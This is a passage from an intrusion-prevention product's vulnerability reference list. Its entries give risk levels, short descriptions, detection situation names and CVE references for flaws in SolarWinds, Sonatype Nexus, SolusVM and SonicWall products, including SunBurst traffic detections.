https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25274
Back to top

Solarwinds-Orion-Platform-Rendercontrol-Insecure-Deserialization

About this vulnerability: A vulnerability in SolarWinds Orion
Risk: Moderate
First detected in: sgpkg-ips-1401-5242
Last changed: sgpkg-ips-1401-5242
Platform: Generic
Software: SolarWinds Orion
Type: Input Validation
Description: Improper validation of incoming JSON data causes a deserialization vulnerability in multiple SolarWinds products. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: File-Text_Solarwinds-Orion-Platform-Rendercontrol-Insecure-Deserialization
References:
CVE-2021-35215
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35215
Back to top

Solarwinds-Security-Event-Manager-Amf-Insecure-Deserialization

About this vulnerability: A vulnerability in SolarWinds Security Event Manager
Risk: High
First detected in: sgpkg-ips-1706-5242
Last changed: sgpkg-ips-1706-5242
Platform: Generic
Software: SolarWinds Security Event Manager
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported for SolarWinds Security Event Manager. This vulnerability is due to improper input validation in the AMF endpoints. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in remote code execution in the context of the service account.
Situation: HTTP_CS-Solarwinds-Security-Event-Manager-Amf-Insecure-Deserialization
References:
CVE-2024-0692
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-0692
Back to top

Solarwinds-Serv-U-Directory-Traversal-CVE-2024-28995

About this vulnerability: An attempt to exploit a vulnerability in SolarWinds Serv-U FTP Server detected
Risk: High
First detected in: sgpkg-ips-1738-5242
Last changed: sgpkg-ips-1738-5242
Platform: Generic
Software: SolarWinds Serv-U FTP Server
Type: Input Validation
Description: SolarWinds Serv-U was susceptible to a directory transversal vulnerability that would allow access to read sensitive files on the host machine.
Situation: HTTP_CSU-Solarwinds-Serv-U-Directory-Traversal-CVE-2024-28995
References:
CVE-2024-28995
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28995
Back to top

Solarwinds-Serv-U-FTP-Server-SSH-AES-NEWKEYS-Uninitialized-Memory-Use

About this vulnerability: A vulnerability in SolarWinds Serv-U FTP Server.
Risk: High
First detected in: sgpkg-ips-1441-5242
Last changed: sgpkg-ips-1441-5242
Platform: Generic
Software: SolarWinds Serv-U FTP Server
Type: Malfunction
Description: A vulnerability in the SSH component of SolarWinds Serv-U FTP Server and Managed File Transfer, FTP Server prior to 15.2.3 Hotfix 2, Managed File Transfer prior to 15.2.3 Hotfix 2, which allows remote attackers to execute arbitrary code by sending crafted messages to the target server, due to the improper handling of NEWKEYS messages when using the AES encryption algorithm.
Situation: SSH_CS-Solarwinds-Serv-U-FTP-Server-SSH-AES-NEWKEYS-Uninitialized-Memory-Use
References:
CVE-2021-35211
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35211
Back to top

Solarwinds-Serv-U-FTP-Server-User_Full_Name-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in SolarWinds Serv-U FTP Server
Risk: Moderate
First detected in: sgpkg-ips-1213-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SolarWinds Serv-U FTP Server
Type: Input Validation
Description: There exists a pre-auth stored cross-site scripting vulnerability in the SolarWinds Serv-U FTP Server. Successful exploitation could lead in arbitrary script execution.
Situation: HTTP_CRL-Solarwinds-Serv-U-FTP-Server-User_Full_Name-Stored-Cross-Site-Scripting
References:
CVE-2019-13182
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13182
Back to top

Solarwinds-Server-And-Application-Monitor-Loadextensionfactory-Code-Execution

About this vulnerability: A vulnerability in SolarWinds Server and Application Monitor
Risk: High
First detected in: sgpkg-ips-672-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SolarWinds Server and Application Monitor
Type: Browser
Description: A code execution vulnerability exists in SolarWinds Server and Application Monitor. The vulnerability is due to insufficient validation in loadExtensionFactory() of a 'factory' object. A remote unauthenticated attacker can exploit the vulnerability by enticing a target user to visit a malicious website. Successful exploitation could allow arbitrary code execution within the security context of the affected process.
Situation: File-Text_Solarwinds-Server-And-Application-Monitor-Loadextensionfactory-Multiple-Vulnerabilities
References:
CVE-2015-1501
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1501
BID-72601
http://www.securityfocus.com/bid/72601
Back to top

Solarwinds-Server-And-Application-Monitor-Loadextensionfactory-Stack-BO

About this vulnerability: A vulnerability in SolarWinds Orion Server & Application Monitor
Risk: Low
First detected in: sgpkg-ips-634-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SolarWinds Server and Application Monitor
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in SolarWinds Server and Application Monitor. The vulnerability is due to insufficient validation in loadExtensionFactory() of a 'factory' object. A remote unauthenticated attacker can exploit the vulnerability by enticing a target user to visit a malicious website. Successful exploitation could allow arbitrary code execution within the security context of the affected process.
Situation: File-Text_Solarwinds-Server-And-Application-Monitor-Loadextensionfactory-Multiple-Vulnerabilities
References:
CVE-2015-1500
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1500
OSVDB-118197
http://www.osvdb.org/118197
Back to top

Solarwinds-Srm-Profiler-Backupassociationservlet-Add-SQL-Injection

About this vulnerability: A vulnerability in SolarWinds Storage Manager
Risk: Moderate
First detected in: sgpkg-ips-818-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SolarWinds Storage Manager
Type: Input Validation
Description: Improper request validation causes an SQL injection vulnerability in SolarWinds Storage Manager. A successful exploitation allows an attacker to run arbitrary code on the target.
Situation: HTTP_CRL-Solarwinds-Srm-Profiler-Backupassociationservlet-Add-SQL-Injection
References:
CVE-2016-4350
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4350
Back to top

Solarwinds-Srm-Profiler-Backupexceptionsservlet-SQL-Injection

About this vulnerability: A vulnerability in SolarWinds Storage Manager
Risk: Moderate
First detected in: sgpkg-ips-761-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SolarWinds Storage Manager
Type: Input Validation
Description: Insufficient parameter validation in SolarWinds Storage Manager results in a SQL injection vulnerability, which when successfully exploited, can result in a attacker gaining the ability to run arbitrary code as the SYSTEM user.
Situation: HTTP_CRL-Solarwinds-Srm-Profiler-Backupexceptionsservlet-SQL-Injection
References:
CVE-2016-4350
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4350
Back to top

Solarwinds-Srm-Profiler-Bexdriveusagesummaryservlet-SQL-Injection

About this vulnerability: A vulnerability in SolarWinds Storage Manager
Risk: Moderate
First detected in: sgpkg-ips-768-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SolarWinds Storage Manager
Type: Input Validation
Description: Insufficient validation of requests results in an SQL injection vulnerability in SolarWinds Storage Manager. Successful exploitation by means of a crafted SQL query can result in the attacker gaining SYSTEM level code execution privileges on the target.
Situation: HTTP_CRL-Solarwinds-Srm-Profiler-Bexdriveusagesummaryservlet-SQL-Injection
References:
CVE-2016-4350
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4350
Back to top

Solarwinds-Srm-Profiler-Duplicatefilesservlet-SQL-Injection

About this vulnerability: A vulnerability in SolarWinds Storage Manager
Risk: Moderate
First detected in: sgpkg-ips-767-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SolarWinds Storage Manager
Type: Input Validation
Description: Insufficient validation of requests results in an SQL injection vulnerability in SolarWinds Storage Manager. Successful exploitation by means of a crafted SQL query can result in the attacker gaining SYSTEM level code execution privileges on the target.
Situation: HTTP_CRL-Solarwinds-Srm-Profiler-Duplicatefilesservlet-SQL-Injection
References:
CVE-2016-4350
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4350
Back to top

Solarwinds-Srm-Profiler-Fileactionassignmentservlet-Assignednames-SQL-Injection

About this vulnerability: A vulnerability in SolarWinds Storage Manager
Risk: Moderate
First detected in: sgpkg-ips-809-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SolarWinds Storage Manager
Type: Input Validation
Description: Improper validation of HTTP requests causes an SQL injection vulnerability in SolarWinds Storage Manager. A successful exploit can allow an attacker to run arbitrary code on the target system.
Situation: HTTP_CRL-Solarwinds-Srm-Profiler-Fileactionassignmentservlet-Assignednames-SQL-Injection
References:
CVE-2016-4350
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4350
Back to top

Solarwinds-Srm-Profiler-Hoststorageservlet-State-Filesystem-Id-SQL-Injection

About this vulnerability: A vulnerability in SolarWinds Storage Manager
Risk: High
First detected in: sgpkg-ips-771-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SolarWinds Storage Manager
Type: Input Validation
Description: An SQL injection vulnerability in the SolarWinds Storage Manager Resource Monitor Profiler Module, versions before 6.2.3, which allows remote attackers to execute arbitrary SQL commands, due to insufficient validation of the orderBy and orderDir parameters in HTTP requests sent to the HostStorageServlet servlet.
Situation: HTTP_CRL-Solarwinds-Srm-Profiler-Hoststorageservlet-State-Filesystem-Id-SQL-Injection
References:
CVE-2016-4350
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4350
Back to top

Solarwinds-Srm-Profiler-Nbuerrormessageservlet-Exitcode-SQL-Injection

About this vulnerability: A vulnerability in SolarWinds Storage Manager
Risk: High
First detected in: sgpkg-ips-773-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SolarWinds Storage Manager
Type: Input Validation
Description: An SQL injection vulnerability in the SolarWinds Storage Manager Resource Monitor Profiler Module, versions before 6.2.3, which allows remote attackers to execute arbitrary SQL commands, due to insufficient validation of the exitCode parameter in HTTP requests sent to the NbuErrorMessageServlet servlet.
Situation: HTTP_CRL-Solarwinds-Srm-Profiler-Nbuerrormessageservlet-Exitcode-SQL-Injection
References:
CVE-2016-4350
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4350
Back to top

Solarwinds-Srm-Profiler-Rulesmetadata-Addnewrule-SQL-Injection

About this vulnerability: A vulnerability in SolarWinds Storage Manager
Risk: High
First detected in: sgpkg-ips-775-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SolarWinds Storage Manager
Type: Input Validation
Description: There exists an SQL injection vulnerability in the SolarWinds Storage Manager Resource Monitor Profiler Module. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: HTTP_CRL-Solarwinds-Srm-Profiler-Rulesmetadata-Addnewrule-SQL-Injection
Back to top

Solarwinds-Srm-Profiler-Scriptservlet-Scriptschedule-SQL-Injection

About this vulnerability: A vulnerability in SolarWinds Storage Manager
Risk: Moderate
First detected in: sgpkg-ips-765-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SolarWinds Storage Manager
Type: Input Validation
Description: Insufficient validation of requests results in an SQL injection vulnerability in the SolarWinds Storage Manager Resource Monitor Profiler module. Successful exploitation by means of a crafted SQL query can result in the attacker gaining SYSTEM level code execution privileges on the target.
Situation: HTTP_CRL-Solarwinds-Srm-Profiler-Scriptservlet-Scriptschedule-SQL-Injection
References:
CVE-2016-4350
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4350
Back to top

Solarwinds-Srm-Profiler-Scriptservlet-State-SQL-Injection

About this vulnerability: A vulnerability in SolarWinds Storage Manager
Risk: Moderate
First detected in: sgpkg-ips-769-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SolarWinds Storage Manager
Type: Input Validation
Description: Insufficient validation of requests results in an SQL injection vulnerability in SolarWinds Storage Manager. Successful exploitation by means of a crafted SQL query can result in the attacker gaining SYSTEM level code execution privileges on the target.
Situation: HTTP_CRL-Solarwinds-Srm-Profiler-Scriptservlet-State-SQL-Injection
References:
CVE-2016-4350
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4350
Back to top

Solarwinds-Srm-Profiler-Scriptservlet-State-Upload-SQL-Injection

About this vulnerability: A vulnerability in SolarWinds Storage Manager
Risk: Moderate
First detected in: sgpkg-ips-782-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SolarWinds Storage Manager
Type: Input Validation
Description: Insufficient validation of HTTP requests results in an SQL injection vulnerability, which can be exploited to allow SYSTEM-level code execution on the target.
Situation: HTTP_CS-Solarwinds-Srm-Profiler-Scriptservlet-State-Upload-SQL-Injection
References:
CVE-2016-4350
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4350
Back to top

Solarwinds-Srm-Profiler-Userdefinedfieldconfigservlet-Saveudf-SQL-Injection

About this vulnerability: A vulnerability in SolarWinds Storage Manager
Risk: Moderate
First detected in: sgpkg-ips-813-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SolarWinds Storage Manager
Type: Input Validation
Description: Insufficient validation of HTTP request parameters causes an SQL injection vulnerability in SolarWinds Storage Manager. A successful attack can allow the attacker to run arbitrary code on the target system.
Situation: HTTP_CRL-Solarwinds-Srm-Profiler-Userdefinedfieldconfigservlet-Saveudf-SQL-Injection
References:
CVE-2016-4350
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4350
Back to top

Solarwinds-Srm-Profiler-Windowseventlogsservlet-SQL-Injection

About this vulnerability: A vulnerability in SolarWinds Storage Manager
Risk: Moderate
First detected in: sgpkg-ips-765-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SolarWinds Storage Manager
Type: Input Validation
Description: Insufficient validation of requests results in an SQL injection vulnerability in the SolarWinds Storage Manager Resource Monitor Profiler module. Successful exploitation by means of a crafted SQL query can result in the attacker gaining SYSTEM level code execution privileges on the target.
Situation: HTTP_CRL-Solarwinds-Srm-Profiler-Windowseventlogsservlet-SQL-Injection
References:
CVE-2016-4350
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4350
Back to top

Solarwinds-Srm-Profiler-Xiotechmonitorservlet-Savesite-SQL-Injection

About this vulnerability: A vulnerability in SolarWinds Storage Manager
Risk: Moderate
First detected in: sgpkg-ips-812-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SolarWinds Storage Manager
Type: Input Validation
Description: Insufficient validation of HTTP requests in the SolarWinds Storage Manager Resource Monitor causes an SQL injection vulnerability. A successful exploitation can allow an attacker to run arbitrary code with system-level privileges.
Situation: HTTP_CRL-Solarwinds-Srm-Profiler-Xiotechmonitorservlet-Savesite-SQL-Injection
References:
CVE-2016-4350
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4350
Back to top

Solarwinds-Storage-Manager-Authenticationfilter-Authentication-Bypass

About this vulnerability: A vulnerability in SolarWinds Storage Manager
Risk: Moderate
First detected in: sgpkg-ips-605-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SolarWinds Storage Manager
Type: Malfunction
Description: An authentication bypass vulnerability exists in SolarWinds Storage Manager. The vulnerability is due to a flaw within the AuthenticationFilter class. A remote unauthenticated attacker could exploit this vulnerability by bypassing the authentication filter and uploading malicious scripts to the target. Successful exploitation could result in code execution under the context of the system.
Situation: HTTP_CSU-Solarwinds-Storage-Manager-Authenticationfilter-Authentication-Bypass
References:
BID-69438
http://www.securityfocus.com/bid/69438
OSVDB-110483
http://www.osvdb.org/110483
Back to top

Solarwinds-Storage-Manager-Authenticationfilter-Policy-Bypass

About this vulnerability: A vulnerability in SolarWinds Storage Manager
Risk: High
First detected in: sgpkg-ips-665-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SolarWinds Storage Manager
Type: Malfunction
Description: A policy bypass vulnerability has been reported in SolarWinds Storage Manager. The vulnerability is due to an issue where the AuthenticationFilter class fails to properly authenticate users prior to processing requests. A remote unauthenticated user can exploit this vulnerability by sending a malicious request to the server AuthenticationFilter class. Successful exploitation could lead to a policy bypass condition on the server.
Situation: HTTP_CSU-Solarwinds-Storage-Manager-Authenticationfilter-Authentication-Bypass
References:
CVE-2015-5371
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5371
Back to top

Solarwinds-SunBurst-Traffic

About this vulnerability: Beacon and other traffic related to the Solarwinds SunBurst intrusion
Risk: High
First detected in: sgpkg-ips-1305-5242
Last changed: sgpkg-ips-1337-5242
Platform: Generic
Software: SolarWinds Orion
Type: Remote Control
Description: Beacon and other traffic related to the Solarwinds SunBurst intrusion
Situation: HTTP_CRL-SunBurst-SUPERNOVA-Traffic-Detected-1
HTTPS_CS-Solarwinds-SunBurst-Beacon
HTTP_CSH-SunBurst-Backdoor-Traffic
File-Binary_SunBurst-TEARDROP-Detected-2
File-Text_Solarwinds-SunBurst-Beacon
File-Text_Solarwinds-SunBurst-COSMICGALE
HTTP_SHS-Solarwinds-SunBurst-Beacon
File-TextId_Solarwinds-SunBurst-Beacon
File-Exe_SunBurst-TEARDROP-Detected-1
File-Exe_SunBurst-SUPERNOVA-Detected-2
File-Exe_SunBurst-SUPERNOVA-Detected-1
File-Exe_SunBurst-SUNBURST-Detected-1
File-Exe_SunBurst-SUNBURST-Detected-2
File-Exe_SunBurst-SUNBURST-Detected-3
Back to top

Solarwinds-TFTP-Server-Denial-Of-Service

About this vulnerability: A Solarwinds TFTP Server Denial Of Service vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-720-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SolarWinds TFTP
Type: Input Validation
Description: A vulnerability in SolarWinds TFTP Server which allows remote attackers to cause a denial of service condition by sending a read request with a non-ascii file name parameter while specifying a "netascii" mode parameter.
Situation: TFTP_Solarwinds-TFTP-Server-Denial-Of-Service
References:
CVE-2010-2115
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2115
OSVDB-64845
http://www.osvdb.org/64845
Back to top

Solarwinds-Virtualization-Manager-Apache-Commons-Deserialization

About this vulnerability: A vulnerability in SolarWinds Virtualization Manager
Risk: High
First detected in: sgpkg-ips-774-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SolarWinds Virtualization Manager
Type: Malfunction
Description: A vulnerability in SolarWinds Virtualization Manager, versions 6.3.1 and before, which allows remote attackers to execute arbitrary commands via a crafted serialized Java object.
Situation: Shared_CS-Java-Rmi-Object-Deserialization-Code-Execution
References:
CVE-2016-3642
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3642
Back to top

Solarwinds-Web-Help-Desk-Ajaxproxy-Insecure-Deserialization

About this vulnerability: A vulnerability in SolarWinds Web Help Desk
Risk: High
First detected in: sgpkg-ips-1777-5242
Last changed: sgpkg-ips-1777-5242
Platform: Generic
Software: SolarWinds Web Help Desk
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in SolarWinds Web Help Desk. The vulnerability is due to improper validation of the JSON object sent to the AjaxProxy component. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in arbitrary code execution under the security context of SYSTEM.
Situation: HTTP_CRL-Solarwinds-Web-Help-Desk-Ajaxproxy-Insecure-Deserialization
References:
CVE-2024-28986
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28986
Back to top

Solarwinds-Web-Help-Desk-Hard-Coded-Credentials

About this vulnerability: A vulnerability in SolarWinds Web Help Desk
Risk: Moderate
First detected in: sgpkg-ips-1789-5242
Last changed: sgpkg-ips-1789-5242
Platform: Generic
Software: SolarWinds Web Help Desk
Type: Malfunction
Description: SolarWinds Web Help Desk allows users to log in using hard-coded credentials, which allows attackers to gain the ability to access and modify arbitrary data on the service.
Situation: HTTP_CSH-Solarwinds-Web-Help-Desk-Hard-Coded-Credentials
References:
CVE-2024-28987
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28987
Back to top

SolusLabs-SolusVM-Centralbackup-SQL-Injection

About this vulnerability: An SQL Injection in SolusLabs SolusVM's centralbackup.php script
Risk: Low
First detected in: sgpkg-ips-787-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SolusLabs SolusVM
Type: SQL Injection
Description: An SQL Injection vulnerability in SolusLabs SolusVM centralbackup.php's deleteid parameter before version 1.13.07.
Situation: HTTP_CRL-SolusLabs-SolusVM-Centralbackup-SQL-Injection
References:
OSVDB-94448
http://www.osvdb.org/94448
Back to top

Sonatype-Nexus-Expression-Language-Injection-CVE-2018-16621

About this vulnerability: A vulnerability in Sonatype Nexus Repository Manager
Risk: High
First detected in: sgpkg-ips-1837-5242
Last changed: sgpkg-ips-1837-5242
Platform: Generic
Software: Sonatype Nexus Repository Manager
Type: Input Validation
Description: An expression language injection vulnerability exists in Sonatype Nexus Repository Manager versions before 3.14. An attacker with an access to an administrative Nexus Repository account can use this vulnerability to execute arbitrary code.
Situation: File-Text_Sonatype-Nexus-Expression-Language-Injection-CVE-2020-10204
References:
CVE-2018-16621
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16621
Back to top

Sonatype-Nexus-Expression-Language-Injection-CVE-2020-10204

About this vulnerability: A vulnerability in Sonatype Nexus Repository Manager
Risk: High
First detected in: sgpkg-ips-1837-5242
Last changed: sgpkg-ips-1837-5242
Platform: Generic
Software: Sonatype Nexus Repository Manager
Type: Input Validation
Description: An expression language injection vulnerability exists in Sonatype Nexus Repository Manager versions before 3.21.2. An attacker with an access to an administrative Nexus Repository account can use this vulnerability to execute arbitrary code.
Situation: File-Text_Sonatype-Nexus-Expression-Language-Injection-CVE-2020-10204
References:
CVE-2020-10204
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10204
Back to top

Sonatype-Nexus-Repository-Manager-Contentselectorsapiresource-XSS

About this vulnerability: A vulnerability in Sonatype Nexus Repository Manager
Risk: Moderate
First detected in: sgpkg-ips-1244-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sonatype Nexus Repository Manager
Type: Input Validation
Description: Insufficient validation of user-sent data in the Java class ContentSelectorsApiResource causes a cross-site scripting vulnerability in Sonatype Nexus Repository Manager. A successful exploit may allow an attacker to execute arbitrary scripts in the browser of a user.
Situation: HTTP_CRL-Sonatype-Nexus-Repository-Manager-Contentselectorsapiresource-Stored-Cross-Site-Scripting
References:
CVE-2020-10203
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10203
Back to top

Sonatype-Nexus-Repository-Manager-CVE-2019-7238-Expression-Language-Injection

About this vulnerability: A vulnerability in Sonatype Nexus Repository Manager
Risk: Moderate
First detected in: sgpkg-ips-1141-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sonatype Nexus Repository Manager
Type: Input Validation
Description: There has been reported an expression language injection vulnerability in Sonatype Nexus Repository Manager. This vulnerability can be exploited by sending a crafted request to the target server. Successful exploitation leads in arbitrary code execution.
Situation: HTTP_CRL-Sonatype-Nexus-Repository-Manager-CVE-2019-7238-Expression-Language-Injection
References:
CVE-2019-7238
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7238
Back to top

Sonatype-Nexus-Repository-Manager-CVE-2021-37152-Cross-Site-Scripting

About this vulnerability: A vulnerability in Sonatype Nexus Repository Manager
Risk: Moderate
First detected in: sgpkg-ips-1400-5242
Last changed: sgpkg-ips-1400-5242
Platform: Generic
Software: Sonatype Nexus Repository Manager
Type: Input Validation
Description: Rendering of unverified web resources uploaded to nexus repositories in the browser causes a cross-site scripting vulnerability in Sonatype Nexus Repository Manager.
Situation: HTTP_CSU-Sonatype-Nexus-Repository-Manager-CVE-2021-37152-Cross-Site-Scripting
References:
CVE-2021-37152
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37152
Back to top

Sonatype-Nexus-Repository-Manager-Webresourceservice-Directory-Traversal

About this vulnerability: A vulnerability in Sonatype Nexus Repository Manager 3 OSS/Pro
Risk: High
First detected in: sgpkg-ips-1732-5242
Last changed: sgpkg-ips-1732-5242
Platform: Generic
Software: Sonatype Nexus Repository Manager
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in Sonatype Nexus Repository Manager. The vulnerability is due to insufficient validation of the URL provided in the HTTP request. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could allow an attacker to perform directory traversal to read sensitive files.
Situation: HTTP_CS-Sonatype-Nexus-Repository-Manager-Webresourceservice-Directory-Traversal
HTTP_CSU-Potential-Dot-Dot-Slash-Directory-Traversal
References:
CVE-2024-4956
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4956
Back to top

SonicWall-Command-Injection-CVE-2021-20039

About this vulnerability: An attempt to exploit a vulnerability in SonicWall
Risk: Moderate
First detected in: sgpkg-ips-1430-5242
Last changed: sgpkg-ips-1430-5242
Platform: Generic
Software: SonicWall
Type: Code Injection
Description: A command injection vulnerability has been reported in the SonicWall SMA 100 series. An authenticated attacker can exploit this vulnerability via a crafted HTTP POST request to /cgi-bin/viewcert. A successful attack can allow command injection with the 'nobody' privileges.
Situation: HTTP_CRL-SonicWall-Command-Injection-CVE-2021-20039
References:
CVE-2021-20039
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20039
Back to top

SonicWall-Email-Security-Path-Traversal-CVE-2021-20023

About this vulnerability: A vulnerability in SonicWall Email Security
Risk: High
First detected in: sgpkg-ips-1405-5242
Last changed: sgpkg-ips-1405-5242
Platform: Generic
Software: SonicWall Email Security
Type: Directory Traversal
Description: There exists a post-auth arbitrary file read vulnerability in SonicWall Email Security.
Situation: HTTP_CSU-SonicWall-Email-Security-Path-Traversal-CVE-2021-20023
References:
CVE-2021-20023
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20023
Back to top

SonicWall-Gms-And-Analytics-Detectinjection-SQL-Injection

About this vulnerability: A vulnerability in SonicWall Analytics
Risk: High
First detected in: sgpkg-ips-1621-5242
Last changed: sgpkg-ips-1625-5242
Platform: Generic
Software: SonicWall Analytics; SonicWall GMS
Type: Input Validation
Description: An SQL injection vulnerability has been reported in SonicWall GMS and Analytics. The vulnerability is due to a security filter bypass that allows an attacker to add crafted data to SQL queries without prior validation. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary SQL command execution against the database on the target server which could be used to achieve arbitrary code execution under the security context of the running service.
Situation: HTTP_CSU-SonicWall-Gms-And-Analytics-Detectinjection-Potential-SQL-Injection
HTTP_CSU-SonicWall-Gms-And-Analytics-Detectinjection-SQL-Injection
HTTP_CRL-SonicWall-Gms-And-Analytics-Detectinjection-Security-Filter-Bypass
HTTP_CRL-SonicWall-Gms-And-Analytics-Detectinjection-SQL-Injection
HTTP_CSH-SonicWall-Gms-And-Analytics-Detectinjection-SQL-Injection
References:
CVE-2023-34133
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34133
Back to top

SonicWall-Gms-And-Analytics-Performdownloadtask-Directory-Traversal

About this vulnerability: A vulnerability in SonicWall Analytics
Risk: Moderate
First detected in: sgpkg-ips-1617-5242
Last changed: sgpkg-ips-1617-5242
Platform: Generic
Software: SonicWall
Type: Directory Traversal
Description: Improper validation of user input used in file operations when downloading backup files causes a directory traversal vulnerability in SonicWall GMS and Analytics. A successful exploitation allows an attacker to read arbitrary files on the target system.
Situation: HTTP_CRL-SonicWall-Gms-And-Analytics-Performdownloadtask-Directory-Traversal
References:
CVE-2023-34125
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34125
Back to top

SonicWall-Gms-And-Analytics-Searchfilter-Command-Injection

About this vulnerability: A vulnerability in SonicWall Analytics
Risk: High
First detected in: sgpkg-ips-1621-5242
Last changed: sgpkg-ips-1621-5242
Platform: Generic
Software: SonicWall Analytics; SonicWall GMS
Type: Input Validation
Description: A command injection vulnerability has been reported in SonicWall GMS and Analytics. The vulnerability is due to improper validation of user data in the searchFilter parameter used in commands. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result arbitrary command execution under the security context of SYSTEM.
Situation: HTTP_CSU-SonicWall-Gms-And-Analytics-Searchfilter-Command-Injection
References:
CVE-2023-34127
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34127
Back to top

SonicWall-Gms-And-Analytics-Unzipfiles-Directory-Traversal

About this vulnerability: A vulnerability in SonicWall Analytics
Risk: High
First detected in: sgpkg-ips-1634-5242
Last changed: sgpkg-ips-1634-5242
Platform: Generic
Software: SonicWall Analytics; SonicWall GMS
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in SonicWall GMS and Analytics. The vulnerability is due to improper validation of file names contained in zip files sent in user requests. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could, in the worst case, result in arbitrary code execution under the security context of SYSTEM or the root user.
Situation: File-Member-Name_SonicWall-Gms-And-Analytics-Unzipfiles-Directory-Traversal
References:
CVE-2023-34129
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34129
Back to top

SonicWall-Gms-Virtual-Appliance-Command-Injection

About this vulnerability: A vulnerability in SonicWall GMS Virtual Appliance
Risk: High
First detected in: sgpkg-ips-1111-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SonicWall GMS
Type: Input Validation
Description: A vulnerability in SonicWall GMS Virtual Appliance, version 8.1 (Build 8110.1197), which allows remote attackers to execute arbitrary commands through the timeSetup.sh script.
Situation: File-TextId_SonicWall-Gms-Virtual-Appliance-Command-Injection
Back to top

SonicWall-Multiple-Products-Authentication-Bypass

About this vulnerability: A vulnerability in SonicWall Analyzer
Risk: High
First detected in: sgpkg-ips-548-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SonicWall Analyzer; SonicWall GMS; SonicWall UMA EM5000; SonicWall ViewPoint
Type: Malfunction
